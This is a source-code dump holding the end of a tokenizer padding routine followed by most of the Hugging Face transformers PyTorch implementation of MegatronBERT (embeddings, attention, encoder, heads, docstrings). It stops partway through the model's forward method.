encoded_inputs["labels"] = encoded_inputs["labels"] + [self.pad_token_label] * difference
if "special_tokens_mask" in encoded_inputs:
encoded_inputs["special_tokens_mask"] = encoded_inputs["special_tokens_mask"] + [1] * difference
encoded_inputs[self.model_input_names[0]] = required_input + [self.pad_token_id] * difference
elif self.padding_side == "left":
if return_attention_mask:
encoded_inputs["attention_mask"] = [0] * difference + encoded_inputs["attention_mask"]
if "token_type_ids" in encoded_inputs:
encoded_inputs["token_type_ids"] = [self.pad_token_type_id] * difference + encoded_inputs[
"token_type_ids"
]
if "bbox" in encoded_inputs:
encoded_inputs["bbox"] = [self.pad_token_box] * difference + encoded_inputs["bbox"]
if "labels" in encoded_inputs:
encoded_inputs["labels"] = [self.pad_token_label] * difference + encoded_inputs["labels"]
if "special_tokens_mask" in encoded_inputs:
encoded_inputs["special_tokens_mask"] = [1] * difference + encoded_inputs["special_tokens_mask"]
encoded_inputs[self.model_input_names[0]] = [self.pad_token_id] * difference + required_input
else:
raise ValueError("Invalid padding strategy:" + str(self.padding_side))
return encoded_inputs
|
27182812/ChatGLM-LLaMA-chinese-insturct | 83,575 | src/transformers/models/megatron_bert/modeling_megatron_bert.py | # coding=utf-8
# Copyright 2018 The Google AI Language Team Authors and The HuggingFace Inc. team.
# Copyright (c) 2018-2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" PyTorch MegatronBERT model."""
import math
import os
import warnings
from dataclasses import dataclass
from typing import Optional, Tuple, Union
import torch
import torch.utils.checkpoint
from torch import nn
from torch.nn import BCEWithLogitsLoss, CrossEntropyLoss, MSELoss
from ...activations import ACT2FN
from ...modeling_outputs import (
BaseModelOutputWithPastAndCrossAttentions,
BaseModelOutputWithPoolingAndCrossAttentions,
CausalLMOutputWithCrossAttentions,
MaskedLMOutput,
MultipleChoiceModelOutput,
NextSentencePredictorOutput,
QuestionAnsweringModelOutput,
SequenceClassifierOutput,
TokenClassifierOutput,
)
from ...modeling_utils import PreTrainedModel
from ...pytorch_utils import apply_chunking_to_forward, find_pruneable_heads_and_indices, prune_linear_layer
from ...utils import (
ModelOutput,
add_code_sample_docstrings,
add_start_docstrings,
add_start_docstrings_to_model_forward,
logging,
replace_return_docstrings,
)
from .configuration_megatron_bert import MegatronBertConfig
logger = logging.get_logger(__name__)
_CONFIG_FOR_DOC = "MegatronBertConfig"
_CHECKPOINT_FOR_DOC = "nvidia/megatron-bert-cased-345m"
MEGATRON_BERT_PRETRAINED_MODEL_ARCHIVE_LIST = [
"nvidia/megatron-bert-cased-345m",
# See all MegatronBERT models at https://huggingface.co/models?filter=megatron_bert
]
def load_tf_weights_in_megatron_bert(model, config, tf_checkpoint_path):
"""Load tf checkpoints in a pytorch model."""
try:
import re
import numpy as np
import tensorflow as tf
except ImportError:
logger.error(
"Loading a TensorFlow model in PyTorch, requires TensorFlow to be installed. Please see "
"https://www.tensorflow.org/install/ for installation instructions."
)
raise
tf_path = os.path.abspath(tf_checkpoint_path)
logger.info("Converting TensorFlow checkpoint from {}".format(tf_path))
# Load weights from TF model
init_vars = tf.train.list_variables(tf_path)
names = []
arrays = []
for name, shape in init_vars:
logger.info(f"Loading TF weight {name} with shape {shape}")
array = tf.train.load_variable(tf_path, name)
names.append(name)
arrays.append(array)
for name, array in zip(names, arrays):
name = name.split("/")
# adam_v and adam_m are variables used in AdamWeightDecayOptimizer to calculated m and v
# which are not required for using pretrained model
if any(
n in ["adam_v", "adam_m", "AdamWeightDecayOptimizer", "AdamWeightDecayOptimizer_1", "global_step"]
for n in name
):
logger.info(f"Skipping {'/'.join(name)}")
continue
pointer = model
for m_name in name:
if re.fullmatch(r"[A-Za-z]+_\d+", m_name):
scope_names = re.split(r"_(\d+)", m_name)
else:
scope_names = [m_name]
if scope_names[0] == "kernel" or scope_names[0] == "gamma":
pointer = getattr(pointer, "weight")
elif scope_names[0] == "output_bias" or scope_names[0] == "beta":
pointer = getattr(pointer, "bias")
elif scope_names[0] == "output_weights":
pointer = getattr(pointer, "weight")
elif scope_names[0] == "squad":
pointer = getattr(pointer, "classifier")
else:
try:
pointer = getattr(pointer, scope_names[0])
except AttributeError:
logger.info(f"Skipping {'/'.join(name)}")
continue
if len(scope_names) >= 2:
num = int(scope_names[1])
pointer = pointer[num]
if m_name[-11:] == "_embeddings":
pointer = getattr(pointer, "weight")
elif m_name == "kernel":
array = np.transpose(array)
if pointer.shape != array.shape:
raise ValueError(f"Pointer shape {pointer.shape} and array shape {array.shape} mismatched")
logger.info("Initialize PyTorch weight {}".format(name))
pointer.data = torch.from_numpy(array)
return model
class MegatronBertEmbeddings(nn.Module):
"""Construct the embeddings from word, position and token_type embeddings."""
def __init__(self, config):
super().__init__()
self.word_embeddings = nn.Embedding(config.vocab_size, config.hidden_size, padding_idx=config.pad_token_id)
self.position_embeddings = nn.Embedding(config.max_position_embeddings, config.hidden_size)
self.token_type_embeddings = nn.Embedding(config.type_vocab_size, config.hidden_size)
# self.LayerNorm is not snake-cased to stick with TensorFlow model variable name and be able to load
# any TensorFlow checkpoint file
# In Megatron, layer-norm is applied after the 1st dropout.
# self.LayerNorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
# position_ids (1, len position emb) is contiguous in memory and exported when serialized
self.register_buffer("position_ids", torch.arange(config.max_position_embeddings).expand((1, -1)))
self.position_embedding_type = getattr(config, "position_embedding_type", "absolute")
def forward(
self,
input_ids: Optional[torch.LongTensor] = None,
token_type_ids: Optional[torch.LongTensor] = None,
position_ids: Optional[torch.LongTensor] = None,
inputs_embeds: Optional[torch.LongTensor] = None,
past_key_values_length: int = 0,
) -> torch.Tensor:
if input_ids is not None:
input_shape = input_ids.size()
else:
input_shape = inputs_embeds.size()[:-1]
seq_length = input_shape[1]
if position_ids is None:
position_ids = self.position_ids[:, past_key_values_length : seq_length + past_key_values_length]
if token_type_ids is None:
token_type_ids = torch.zeros(input_shape, dtype=torch.long, device=self.position_ids.device)
if inputs_embeds is None:
inputs_embeds = self.word_embeddings(input_ids)
token_type_embeddings = self.token_type_embeddings(token_type_ids)
embeddings = inputs_embeds + token_type_embeddings
if self.position_embedding_type == "absolute":
position_embeddings = self.position_embeddings(position_ids)
embeddings += position_embeddings
# Megatron BERT moves that layer norm after the drop-out (and to each layer).
# embeddings = self.LayerNorm(embeddings)
embeddings = self.dropout(embeddings)
return embeddings
# Copied from transformers.models.bert.modeling_bert.BertSelfAttention with Bert->MegatronBert
class MegatronBertSelfAttention(nn.Module):
def __init__(self, config, position_embedding_type=None):
super().__init__()
if config.hidden_size % config.num_attention_heads != 0 and not hasattr(config, "embedding_size"):
raise ValueError(
f"The hidden size ({config.hidden_size}) is not a multiple of the number of attention "
f"heads ({config.num_attention_heads})"
)
self.num_attention_heads = config.num_attention_heads
self.attention_head_size = int(config.hidden_size / config.num_attention_heads)
self.all_head_size = self.num_attention_heads * self.attention_head_size
self.query = nn.Linear(config.hidden_size, self.all_head_size)
self.key = nn.Linear(config.hidden_size, self.all_head_size)
self.value = nn.Linear(config.hidden_size, self.all_head_size)
self.dropout = nn.Dropout(config.attention_probs_dropout_prob)
self.position_embedding_type = position_embedding_type or getattr(
config, "position_embedding_type", "absolute"
)
if self.position_embedding_type == "relative_key" or self.position_embedding_type == "relative_key_query":
self.max_position_embeddings = config.max_position_embeddings
self.distance_embedding = nn.Embedding(2 * config.max_position_embeddings - 1, self.attention_head_size)
self.is_decoder = config.is_decoder
def transpose_for_scores(self, x: torch.Tensor) -> torch.Tensor:
new_x_shape = x.size()[:-1] + (self.num_attention_heads, self.attention_head_size)
x = x.view(new_x_shape)
return x.permute(0, 2, 1, 3)
def forward(
self,
hidden_states: torch.Tensor,
attention_mask: Optional[torch.FloatTensor] = None,
head_mask: Optional[torch.FloatTensor] = None,
encoder_hidden_states: Optional[torch.FloatTensor] = None,
encoder_attention_mask: Optional[torch.FloatTensor] = None,
past_key_value: Optional[Tuple[Tuple[torch.FloatTensor]]] = None,
output_attentions: Optional[bool] = False,
) -> Tuple[torch.Tensor]:
mixed_query_layer = self.query(hidden_states)
# If this is instantiated as a cross-attention module, the keys
# and values come from an encoder; the attention mask needs to be
# such that the encoder's padding tokens are not attended to.
is_cross_attention = encoder_hidden_states is not None
if is_cross_attention and past_key_value is not None:
# reuse k,v, cross_attentions
key_layer = past_key_value[0]
value_layer = past_key_value[1]
attention_mask = encoder_attention_mask
elif is_cross_attention:
key_layer = self.transpose_for_scores(self.key(encoder_hidden_states))
value_layer = self.transpose_for_scores(self.value(encoder_hidden_states))
attention_mask = encoder_attention_mask
elif past_key_value is not None:
key_layer = self.transpose_for_scores(self.key(hidden_states))
value_layer = self.transpose_for_scores(self.value(hidden_states))
key_layer = torch.cat([past_key_value[0], key_layer], dim=2)
value_layer = torch.cat([past_key_value[1], value_layer], dim=2)
else:
key_layer = self.transpose_for_scores(self.key(hidden_states))
value_layer = self.transpose_for_scores(self.value(hidden_states))
query_layer = self.transpose_for_scores(mixed_query_layer)
use_cache = past_key_value is not None
if self.is_decoder:
# if cross_attention save Tuple(torch.Tensor, torch.Tensor) of all cross attention key/value_states.
# Further calls to cross_attention layer can then reuse all cross-attention
# key/value_states (first "if" case)
# if uni-directional self-attention (decoder) save Tuple(torch.Tensor, torch.Tensor) of
# all previous decoder key/value_states. Further calls to uni-directional self-attention
# can concat previous decoder key/value_states to current projected key/value_states (third "elif" case)
# if encoder bi-directional self-attention `past_key_value` is always `None`
past_key_value = (key_layer, value_layer)
# Take the dot product between "query" and "key" to get the raw attention scores.
attention_scores = torch.matmul(query_layer, key_layer.transpose(-1, -2))
if self.position_embedding_type == "relative_key" or self.position_embedding_type == "relative_key_query":
query_length, key_length = query_layer.shape[2], key_layer.shape[2]
if use_cache:
position_ids_l = torch.tensor(key_length - 1, dtype=torch.long, device=hidden_states.device).view(
-1, 1
)
else:
position_ids_l = torch.arange(query_length, dtype=torch.long, device=hidden_states.device).view(-1, 1)
position_ids_r = torch.arange(key_length, dtype=torch.long, device=hidden_states.device).view(1, -1)
distance = position_ids_l - position_ids_r
positional_embedding = self.distance_embedding(distance + self.max_position_embeddings - 1)
positional_embedding = positional_embedding.to(dtype=query_layer.dtype) # fp16 compatibility
if self.position_embedding_type == "relative_key":
relative_position_scores = torch.einsum("bhld,lrd->bhlr", query_layer, positional_embedding)
attention_scores = attention_scores + relative_position_scores
elif self.position_embedding_type == "relative_key_query":
relative_position_scores_query = torch.einsum("bhld,lrd->bhlr", query_layer, positional_embedding)
relative_position_scores_key = torch.einsum("bhrd,lrd->bhlr", key_layer, positional_embedding)
attention_scores = attention_scores + relative_position_scores_query + relative_position_scores_key
attention_scores = attention_scores / math.sqrt(self.attention_head_size)
if attention_mask is not None:
# Apply the attention mask is (precomputed for all layers in MegatronBertModel forward() function)
attention_scores = attention_scores + attention_mask
# Normalize the attention scores to probabilities.
attention_probs = nn.functional.softmax(attention_scores, dim=-1)
# This is actually dropping out entire tokens to attend to, which might
# seem a bit unusual, but is taken from the original Transformer paper.
attention_probs = self.dropout(attention_probs)
# Mask heads if we want to
if head_mask is not None:
attention_probs = attention_probs * head_mask
context_layer = torch.matmul(attention_probs, value_layer)
context_layer = context_layer.permute(0, 2, 1, 3).contiguous()
new_context_layer_shape = context_layer.size()[:-2] + (self.all_head_size,)
context_layer = context_layer.view(new_context_layer_shape)
outputs = (context_layer, attention_probs) if output_attentions else (context_layer,)
if self.is_decoder:
outputs = outputs + (past_key_value,)
return outputs
# Based transformers.models.bert.modeling_bert.BertSelfOutput. Moved LayerNorm to MegatronBertAttention below.
class MegatronBertSelfOutput(nn.Module):
def __init__(self, config):
super().__init__()
self.dense = nn.Linear(config.hidden_size, config.hidden_size)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
def forward(self, hidden_states: torch.Tensor, residual: torch.Tensor) -> torch.Tensor:
hidden_states = self.dense(hidden_states)
hidden_states = self.dropout(hidden_states)
return residual + hidden_states
# Based transformers.models.bert.modeling_bert.BertAttention. Added LayerNorm.
class MegatronBertAttention(nn.Module):
def __init__(self, config):
super().__init__()
self.ln = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
self.self = MegatronBertSelfAttention(config)
self.output = MegatronBertSelfOutput(config)
self.pruned_heads = set()
def prune_heads(self, heads):
if len(heads) == 0:
return
heads, index = find_pruneable_heads_and_indices(
heads, self.self.num_attention_heads, self.self.attention_head_size, self.pruned_heads
)
# Prune linear layers
self.self.query = prune_linear_layer(self.self.query, index)
self.self.key = prune_linear_layer(self.self.key, index)
self.self.value = prune_linear_layer(self.self.value, index)
self.output.dense = prune_linear_layer(self.output.dense, index, dim=1)
# Update hyper params and store pruned heads
self.self.num_attention_heads = self.self.num_attention_heads - len(heads)
self.self.all_head_size = self.self.attention_head_size * self.self.num_attention_heads
self.pruned_heads = self.pruned_heads.union(heads)
def forward(
self,
hidden_states: torch.Tensor,
attention_mask: Optional[torch.FloatTensor] = None,
head_mask: Optional[torch.FloatTensor] = None,
encoder_hidden_states: Optional[torch.FloatTensor] = None,
encoder_attention_mask: Optional[torch.FloatTensor] = None,
past_key_value: Optional[Tuple[Tuple[torch.FloatTensor]]] = None,
output_attentions: Optional[bool] = False,
) -> Tuple[torch.Tensor]:
ln_outputs = self.ln(hidden_states)
self_outputs = self.self(
ln_outputs,
attention_mask,
head_mask,
encoder_hidden_states,
encoder_attention_mask,
past_key_value,
output_attentions,
)
attention_output = self.output(self_outputs[0], hidden_states)
outputs = (attention_output,) + self_outputs[1:] # add attentions if we output them
return outputs
# Copied from transformers.models.bert.modeling_bert.BertIntermediate with Bert->MegatronBert
class MegatronBertIntermediate(nn.Module):
def __init__(self, config):
super().__init__()
self.dense = nn.Linear(config.hidden_size, config.intermediate_size)
if isinstance(config.hidden_act, str):
self.intermediate_act_fn = ACT2FN[config.hidden_act]
else:
self.intermediate_act_fn = config.hidden_act
def forward(self, hidden_states: torch.Tensor) -> torch.Tensor:
hidden_states = self.dense(hidden_states)
hidden_states = self.intermediate_act_fn(hidden_states)
return hidden_states
# Based on transformers.models.bert.modeling_bert.BertOutput. Moved LayerNorm to MegatronBertLayer below.
class MegatronBertOutput(nn.Module):
def __init__(self, config):
super().__init__()
self.dense = nn.Linear(config.intermediate_size, config.hidden_size)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
def forward(self, hidden_states: torch.Tensor, input_tensor: torch.Tensor) -> torch.Tensor:
hidden_states = self.dense(hidden_states)
hidden_states = self.dropout(hidden_states)
return input_tensor + hidden_states
# Based on transformers.models.bert.modeling_bert.BertLayer. Added LayerNorm.
class MegatronBertLayer(nn.Module):
def __init__(self, config):
super().__init__()
self.chunk_size_feed_forward = config.chunk_size_feed_forward
self.seq_len_dim = 1
self.attention = MegatronBertAttention(config)
self.is_decoder = config.is_decoder
self.add_cross_attention = config.add_cross_attention
if self.add_cross_attention:
if not self.is_decoder:
raise TypeError(f"{self} should be used as a decoder model if cross attention is added")
self.crossattention = MegatronBertAttention(config)
self.ln = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
self.intermediate = MegatronBertIntermediate(config)
self.output = MegatronBertOutput(config)
def forward(
self,
hidden_states: torch.Tensor,
attention_mask: Optional[torch.FloatTensor] = None,
head_mask: Optional[torch.FloatTensor] = None,
encoder_hidden_states: Optional[torch.FloatTensor] = None,
encoder_attention_mask: Optional[torch.FloatTensor] = None,
past_key_value: Optional[Tuple[Tuple[torch.FloatTensor]]] = None,
output_attentions: Optional[bool] = False,
) -> Tuple[torch.Tensor]:
# decoder uni-directional self-attention cached key/values tuple is at positions 1,2
self_attn_past_key_value = past_key_value[:2] if past_key_value is not None else None
self_attention_outputs = self.attention(
hidden_states,
attention_mask,
head_mask,
output_attentions=output_attentions,
past_key_value=self_attn_past_key_value,
)
attention_output = self_attention_outputs[0]
# if decoder, the last output is tuple of self-attn cache
if self.is_decoder:
outputs = self_attention_outputs[1:-1]
present_key_value = self_attention_outputs[-1]
else:
outputs = self_attention_outputs[1:] # add self attentions if we output attention weights
cross_attn_present_key_value = None
if self.is_decoder and encoder_hidden_states is not None:
if not hasattr(self, "crossattention"):
raise AttributeError(
f"If `encoder_hidden_states` are passed, {self} has to be instantiated with cross-attention layers"
" by setting `config.add_cross_attention=True`"
)
# cross_attn cached key/values tuple is at positions 3,4 of past_key_value tuple
cross_attn_past_key_value = past_key_value[-2:] if past_key_value is not None else None
cross_attention_outputs = self.crossattention(
attention_output,
attention_mask,
head_mask,
encoder_hidden_states,
encoder_attention_mask,
cross_attn_past_key_value,
output_attentions,
)
attention_output = cross_attention_outputs[0]
outputs = outputs + cross_attention_outputs[1:-1] # add cross attentions if we output attention weights
# add cross-attn cache to positions 3,4 of present_key_value tuple
cross_attn_present_key_value = cross_attention_outputs[-1]
present_key_value = present_key_value + cross_attn_present_key_value
layer_output = apply_chunking_to_forward(
self.feed_forward_chunk, self.chunk_size_feed_forward, self.seq_len_dim, attention_output
)
outputs = (layer_output,) + outputs
# if decoder, return the attn key/values as the last output
if self.is_decoder:
outputs = outputs + (present_key_value,)
return outputs
def feed_forward_chunk(self, attention_output):
ln_output = self.ln(attention_output)
intermediate_output = self.intermediate(ln_output)
layer_output = self.output(intermediate_output, attention_output)
return layer_output
class MegatronBertEncoder(nn.Module):
def __init__(self, config):
super().__init__()
self.config = config
self.layer = nn.ModuleList([MegatronBertLayer(config) for _ in range(config.num_hidden_layers)])
# The final layer norm. We removed the 1st LN, moved LN to each hidden layer and this one
# is simply the final LN (Transformer's BERT has it attached to each hidden layer).
self.ln = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
self.gradient_checkpointing = False
def forward(
self,
hidden_states: torch.Tensor,
attention_mask: Optional[torch.FloatTensor] = None,
head_mask: Optional[torch.FloatTensor] = None,
encoder_hidden_states: Optional[torch.FloatTensor] = None,
encoder_attention_mask: Optional[torch.FloatTensor] = None,
past_key_values: Optional[Tuple[Tuple[torch.FloatTensor]]] = None,
use_cache: Optional[bool] = None,
output_attentions: Optional[bool] = False,
output_hidden_states: Optional[bool] = False,
return_dict: Optional[bool] = True,
) -> Union[Tuple, BaseModelOutputWithPastAndCrossAttentions]:
if self.gradient_checkpointing and self.training:
if use_cache:
logger.warning_once(
"`use_cache=True` is incompatible with gradient checkpointing. Setting `use_cache=False`..."
)
use_cache = False
all_hidden_states = () if output_hidden_states else None
all_self_attentions = () if output_attentions else None
all_cross_attentions = () if output_attentions and self.config.add_cross_attention else None
next_decoder_cache = () if use_cache else None
for i, layer_module in enumerate(self.layer):
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
layer_head_mask = head_mask[i] if head_mask is not None else None
past_key_value = past_key_values[i] if past_key_values is not None else None
if self.gradient_checkpointing and self.training:
def create_custom_forward(module):
def custom_forward(*inputs):
return module(*inputs, past_key_value, output_attentions)
return custom_forward
layer_outputs = torch.utils.checkpoint.checkpoint(
create_custom_forward(layer_module),
hidden_states,
attention_mask,
layer_head_mask,
encoder_hidden_states,
encoder_attention_mask,
)
else:
layer_outputs = layer_module(
hidden_states,
attention_mask,
layer_head_mask,
encoder_hidden_states,
encoder_attention_mask,
past_key_value,
output_attentions,
)
# Because we moved the layer-norm at the end of the hidden layer, we have non-normali-
# zed data here. If that's really needed, we must apply LN to match Transformer's BERT.
hidden_states = layer_outputs[0]
if use_cache:
next_decoder_cache += (layer_outputs[-1],)
if output_attentions:
all_self_attentions = all_self_attentions + (layer_outputs[1],)
if self.config.add_cross_attention:
all_cross_attentions = all_cross_attentions + (layer_outputs[2],)
# Finalize the hidden states.
hidden_states = self.ln(hidden_states)
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
if not return_dict:
return tuple(
v
for v in [
hidden_states,
next_decoder_cache,
all_hidden_states,
all_self_attentions,
all_cross_attentions,
]
if v is not None
)
return BaseModelOutputWithPastAndCrossAttentions(
last_hidden_state=hidden_states,
past_key_values=next_decoder_cache,
hidden_states=all_hidden_states,
attentions=all_self_attentions,
cross_attentions=all_cross_attentions,
)
# Copied from transformers.models.bert.modeling_bert.BertPooler with Bert->MegatronBert
class MegatronBertPooler(nn.Module):
def __init__(self, config):
super().__init__()
self.dense = nn.Linear(config.hidden_size, config.hidden_size)
self.activation = nn.Tanh()
def forward(self, hidden_states: torch.Tensor) -> torch.Tensor:
# We "pool" the model by simply taking the hidden state corresponding
# to the first token.
first_token_tensor = hidden_states[:, 0]
pooled_output = self.dense(first_token_tensor)
pooled_output = self.activation(pooled_output)
return pooled_output
# Copied from transformers.models.bert.modeling_bert.BertPredictionHeadTransform with Bert->MegatronBert
class MegatronBertPredictionHeadTransform(nn.Module):
def __init__(self, config):
super().__init__()
self.dense = nn.Linear(config.hidden_size, config.hidden_size)
if isinstance(config.hidden_act, str):
self.transform_act_fn = ACT2FN[config.hidden_act]
else:
self.transform_act_fn = config.hidden_act
self.LayerNorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
def forward(self, hidden_states: torch.Tensor) -> torch.Tensor:
hidden_states = self.dense(hidden_states)
hidden_states = self.transform_act_fn(hidden_states)
hidden_states = self.LayerNorm(hidden_states)
return hidden_states
# Copied from transformers.models.bert.modeling_bert.BertLMPredictionHead with Bert->MegatronBert
class MegatronBertLMPredictionHead(nn.Module):
def __init__(self, config):
super().__init__()
self.transform = MegatronBertPredictionHeadTransform(config)
# The output weights are the same as the input embeddings, but there is
# an output-only bias for each token.
self.decoder = nn.Linear(config.hidden_size, config.vocab_size, bias=False)
self.bias = nn.Parameter(torch.zeros(config.vocab_size))
# Need a link between the two variables so that the bias is correctly resized with `resize_token_embeddings`
self.decoder.bias = self.bias
def forward(self, hidden_states):
hidden_states = self.transform(hidden_states)
hidden_states = self.decoder(hidden_states)
return hidden_states
# Copied from transformers.models.bert.modeling_bert.BertOnlyMLMHead with Bert->MegatronBert
class MegatronBertOnlyMLMHead(nn.Module):
def __init__(self, config):
super().__init__()
self.predictions = MegatronBertLMPredictionHead(config)
def forward(self, sequence_output: torch.Tensor) -> torch.Tensor:
prediction_scores = self.predictions(sequence_output)
return prediction_scores
# Copied from transformers.models.bert.modeling_bert.BertOnlyNSPHead with Bert->MegatronBert
class MegatronBertOnlyNSPHead(nn.Module):
def __init__(self, config):
super().__init__()
self.seq_relationship = nn.Linear(config.hidden_size, 2)
def forward(self, pooled_output):
seq_relationship_score = self.seq_relationship(pooled_output)
return seq_relationship_score
# Copied from transformers.models.bert.modeling_bert.BertPreTrainingHeads with Bert->MegatronBert
class MegatronBertPreTrainingHeads(nn.Module):
def __init__(self, config):
super().__init__()
self.predictions = MegatronBertLMPredictionHead(config)
self.seq_relationship = nn.Linear(config.hidden_size, 2)
def forward(self, sequence_output, pooled_output):
prediction_scores = self.predictions(sequence_output)
seq_relationship_score = self.seq_relationship(pooled_output)
return prediction_scores, seq_relationship_score
class MegatronBertPreTrainedModel(PreTrainedModel):
"""
An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained
models.
"""
config_class = MegatronBertConfig
load_tf_weights = load_tf_weights_in_megatron_bert
base_model_prefix = "bert"
supports_gradient_checkpointing = True
_keys_to_ignore_on_load_missing = [r"position_ids"]
def _init_weights(self, module):
"""Initialize the weights"""
if isinstance(module, (nn.Linear, nn.Embedding)):
# Slightly different from the TF version which uses truncated_normal for initialization
# cf https://github.com/pytorch/pytorch/pull/5617
module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
elif isinstance(module, nn.LayerNorm):
module.bias.data.zero_()
module.weight.data.fill_(1.0)
if isinstance(module, nn.Linear) and module.bias is not None:
module.bias.data.zero_()
def _set_gradient_checkpointing(self, module, value=False):
if isinstance(module, MegatronBertEncoder):
module.gradient_checkpointing = value
@dataclass
# Copied from transformers.models.bert.modeling_bert.BertForPreTrainingOutput with Bert->MegatronBert
class MegatronBertForPreTrainingOutput(ModelOutput):
"""
Output type of [`MegatronBertForPreTraining`].
Args:
loss (*optional*, returned when `labels` is provided, `torch.FloatTensor` of shape `(1,)`):
Total loss as the sum of the masked language modeling loss and the next sequence prediction
(classification) loss.
prediction_logits (`torch.FloatTensor` of shape `(batch_size, sequence_length, config.vocab_size)`):
Prediction scores of the language modeling head (scores for each vocabulary token before SoftMax).
seq_relationship_logits (`torch.FloatTensor` of shape `(batch_size, 2)`):
Prediction scores of the next sequence prediction (classification) head (scores of True/False continuation
before SoftMax).
hidden_states (`tuple(torch.FloatTensor)`, *optional*, returned when `output_hidden_states=True` is passed or when `config.output_hidden_states=True`):
Tuple of `torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer) of
shape `(batch_size, sequence_length, hidden_size)`.
Hidden-states of the model at the output of each layer plus the initial embedding outputs.
attentions (`tuple(torch.FloatTensor)`, *optional*, returned when `output_attentions=True` is passed or when `config.output_attentions=True`):
Tuple of `torch.FloatTensor` (one for each layer) of shape `(batch_size, num_heads, sequence_length,
sequence_length)`.
Attentions weights after the attention softmax, used to compute the weighted average in the self-attention
heads.
"""
loss: Optional[torch.FloatTensor] = None
prediction_logits: torch.FloatTensor = None
seq_relationship_logits: torch.FloatTensor = None
hidden_states: Optional[Tuple[torch.FloatTensor]] = None
attentions: Optional[Tuple[torch.FloatTensor]] = None
MEGATRON_BERT_START_DOCSTRING = r"""
This model inherits from [`PreTrainedModel`]. Check the superclass documentation for the generic methods the
library implements for all its model (such as downloading or saving, resizing the input embeddings, pruning heads
etc.)
This model is also a PyTorch [torch.nn.Module](https://pytorch.org/docs/stable/nn.html#torch.nn.Module) subclass.
Use it as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to general usage
and behavior.
Parameters:
config ([`MegatronBertConfig`]): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the
configuration. Check out the [`~PreTrainedModel.from_pretrained`] method to load the model weights.
"""
MEGATRON_BERT_INPUTS_DOCSTRING = r"""
Args:
input_ids (`torch.LongTensor` of shape `({0})`):
Indices of input sequence tokens in the vocabulary.
Indices can be obtained using [`AutoTokenizer`]. See [`PreTrainedTokenizer.encode`] and
[`PreTrainedTokenizer.__call__`] for details.
[What are input IDs?](../glossary#input-ids)
attention_mask (`torch.FloatTensor` of shape `({0})`, *optional*):
Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
[What are attention masks?](../glossary#attention-mask)
token_type_ids (`torch.LongTensor` of shape `({0})`, *optional*):
Segment token indices to indicate first and second portions of the inputs. Indices are selected in `[0,
1]`:
- 0 corresponds to a *sentence A* token,
- 1 corresponds to a *sentence B* token.
[What are token type IDs?](../glossary#token-type-ids)
position_ids (`torch.LongTensor` of shape `({0})`, *optional*):
Indices of positions of each input sequence tokens in the position embeddings. Selected in the range `[0,
config.max_position_embeddings - 1]`.
[What are position IDs?](../glossary#position-ids)
head_mask (`torch.FloatTensor` of shape `(num_heads,)` or `(num_layers, num_heads)`, *optional*):
Mask to nullify selected heads of the self-attention modules. Mask values selected in `[0, 1]`:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
inputs_embeds (`torch.FloatTensor` of shape `({0}, hidden_size)`, *optional*):
Optionally, instead of passing `input_ids` you can choose to directly pass an embedded representation. This
is useful if you want more control over how to convert `input_ids` indices into associated vectors than the
model's internal embedding lookup matrix.
output_attentions (`bool`, *optional*):
Whether or not to return the attentions tensors of all attention layers. See `attentions` under returned
tensors for more detail.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for
more detail.
return_dict (`bool`, *optional*):
Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple.
"""
@add_start_docstrings(
"The bare MegatronBert Model transformer outputting raw hidden-states without any specific head on top.",
MEGATRON_BERT_START_DOCSTRING,
)
class MegatronBertModel(MegatronBertPreTrainedModel):
"""
The model can behave as an encoder (with only self-attention) as well as a decoder, in which case a layer of
cross-attention is added between the self-attention layers, following the architecture described in [Attention is
all you need](https://arxiv.org/abs/1706.03762) by Ashish Vaswani, Noam Shazeer, Niki Parmar, Jakob Uszkoreit,
Llion Jones, Aidan N. Gomez, Lukasz Kaiser and Illia Polosukhin.
To behave as an decoder the model needs to be initialized with the `is_decoder` argument of the configuration set
to `True`. To be used in a Seq2Seq model, the model needs to initialized with both `is_decoder` argument and
`add_cross_attention` set to `True`; an `encoder_hidden_states` is then expected as an input to the forward pass.
"""
def __init__(self, config, add_pooling_layer=True):
super().__init__(config)
self.config = config
self.embeddings = MegatronBertEmbeddings(config)
self.encoder = MegatronBertEncoder(config)
self.pooler = MegatronBertPooler(config) if add_pooling_layer else None
# Initialize weights and apply final processing
self.post_init()
def get_input_embeddings(self):
return self.embeddings.word_embeddings
def set_input_embeddings(self, value):
self.embeddings.word_embeddings = value
def _prune_heads(self, heads_to_prune):
"""
Prunes heads of the model. heads_to_prune: dict of {layer_num: list of heads to prune in this layer} See base
class PreTrainedModel
"""
for layer, heads in heads_to_prune.items():
self.encoder.layer[layer].attention.prune_heads(heads)
@add_start_docstrings_to_model_forward(MEGATRON_BERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
@add_code_sample_docstrings(
checkpoint=_CHECKPOINT_FOR_DOC,
output_type=BaseModelOutputWithPoolingAndCrossAttentions,
config_class=_CONFIG_FOR_DOC,
)
def forward(
self,
input_ids: Optional[torch.LongTensor] = None,
